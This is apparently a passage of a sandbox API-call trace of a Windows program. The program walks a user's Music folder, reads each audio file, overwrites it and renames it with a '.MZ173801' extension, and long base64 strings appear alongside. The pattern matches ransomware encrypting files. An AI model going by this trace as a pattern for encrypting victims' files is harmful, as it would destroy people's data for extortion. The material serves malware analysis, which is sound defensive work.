ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0x51bcc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x51bcc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0117.673] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbbfb0860, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0x9ff794a0, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0x9ff794a0, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="C5CIxe6", cAlternateFileName="")) returned 1 [0117.673] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a32cd40, ftCreationTime.dwHighDateTime=0x1d5e21f, ftLastAccessTime.dwLowDateTime=0x47c2db70, ftLastAccessTime.dwHighDateTime=0x1d5ea0b, ftLastWriteTime.dwLowDateTime=0x47c2db70, ftLastWriteTime.dwHighDateTime=0x1d5ea0b, nFileSizeHigh=0x0, nFileSizeLow=0xde30, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="GuM0xcHUsONHLGItnv.wav", cAlternateFileName="GUM0XC~1.WAV")) returned 1 [0117.673] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0117.673] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\GuM0xcHUsONHLGItnv.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\gum0xchusonhlgitnv.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a32cd40, ftCreationTime.dwHighDateTime=0x1d5e21f, ftLastAccessTime.dwLowDateTime=0x47c2db70, ftLastAccessTime.dwHighDateTime=0x1d5ea0b, ftLastWriteTime.dwLowDateTime=0x47c2db70, ftLastWriteTime.dwHighDateTime=0x1d5ea0b, nFileSizeHigh=0x0, nFileSizeLow=0xde30)) returned 1 [0117.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.674] GetCurrentThreadId () returned 0x1358 [0117.674] GetCurrentThreadId () returned 0x1358 [0117.674] GetCurrentThreadId () returned 0x1358 [0117.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.675] GetCurrentThreadId () returned 0x1358 [0117.675] GetCurrentThreadId () returned 0x1358 [0117.675] GetCurrentThreadId () returned 0x1358 [0117.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\GuM0xcHUsONHLGItnv.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\gum0xchusonhlgitnv.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.675] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0117.675] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.675] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0xde30 [0117.675] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.675] ReadFile (in: hFile=0x408, lpBuffer=0x2439f90, nNumberOfBytesToRead=0xde30, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19f14c*=0xde30, lpOverlapped=0x0) returned 1 [0117.676] CloseHandle (hObject=0x408) returned 1 [0117.677] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\GuM0xcHUsONHLGItnv.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\gum0xchusonhlgitnv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.679] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xde30, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0xde30, lpOverlapped=0x0) returned 1 [0117.680] CloseHandle (hObject=0x408) returned 1 [0117.685] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\GuM0xcHUsONHLGItnv.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\gum0xchusonhlgitnv.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\GuM0xcHUsONHLGItnv.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\gum0xchusonhlgitnv.wav.mz173801")) returned 1 [0117.685] GetCurrentThreadId () returned 0x1358 [0117.685] GetCurrentThreadId () returned 0x1358 [0117.686] GetCurrentThreadId () returned 0x1358 [0117.686] GetCurrentThreadId () returned 0x1358 [0117.686] GetCurrentThreadId () returned 0x1358 [0117.686] GetCurrentThreadId () returned 0x1358 [0117.686] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a32cd40, ftCreationTime.dwHighDateTime=0x1d5e21f, ftLastAccessTime.dwLowDateTime=0x47c2db70, ftLastAccessTime.dwHighDateTime=0x1d5ea0b, ftLastWriteTime.dwLowDateTime=0x47c2db70, ftLastWriteTime.dwHighDateTime=0x1d5ea0b, nFileSizeHigh=0x0, nFileSizeLow=0xde30, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="GuM0xcHUsONHLGItnv.wav", cAlternateFileName="GUM0XC~1.WAV")) returned 0 [0117.686] GetLastError () returned 0x12 [0117.686] FindClose (in: hFindFile=0xa1bd90 | out: hFindFile=0xa1bd90) returned 1 [0117.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0xa76b3ff1, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa76b3ff1, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0117.686] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0117.686] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.686] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0xa76b3ff1, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa76b3ff1, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0117.686] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.686] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.686] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbbfb0860, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0x9ff794a0, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0x9ff794a0, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="C5CIxe6", cAlternateFileName="")) returned 1 [0117.686] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.686] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\*.*", lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbbfb0860, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0x9ff794a0, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0x9ff794a0, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bb60 [0117.686] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbbfb0860, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0x9ff794a0, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0x9ff794a0, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.686] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a92b240, ftCreationTime.dwHighDateTime=0x1d5e41b, ftLastAccessTime.dwLowDateTime=0xf91cdf0, ftLastAccessTime.dwHighDateTime=0x1d5e4a8, ftLastWriteTime.dwLowDateTime=0xf91cdf0, ftLastWriteTime.dwHighDateTime=0x1d5e4a8, nFileSizeHigh=0x0, nFileSizeLow=0xfcb3, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="62UWGU5J91LxoED4.mp3", cAlternateFileName="62UWGU~1.MP3")) returned 1 [0117.686] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef30 | out: lpLocalFileTime=0x19ef30) returned 1 [0117.686] FileTimeToDosDateTime (in: lpFileTime=0x19ef30, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.686] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\62UWGU5J91LxoED4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\c5cixe6\\62uwgu5j91lxoed4.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19eec0 | out: lpFileInformation=0x19eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a92b240, ftCreationTime.dwHighDateTime=0x1d5e41b, ftLastAccessTime.dwLowDateTime=0xf91cdf0, ftLastAccessTime.dwHighDateTime=0x1d5e4a8, ftLastWriteTime.dwLowDateTime=0xf91cdf0, ftLastWriteTime.dwHighDateTime=0x1d5e4a8, nFileSizeHigh=0x0, nFileSizeLow=0xfcb3)) returned 1 [0117.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 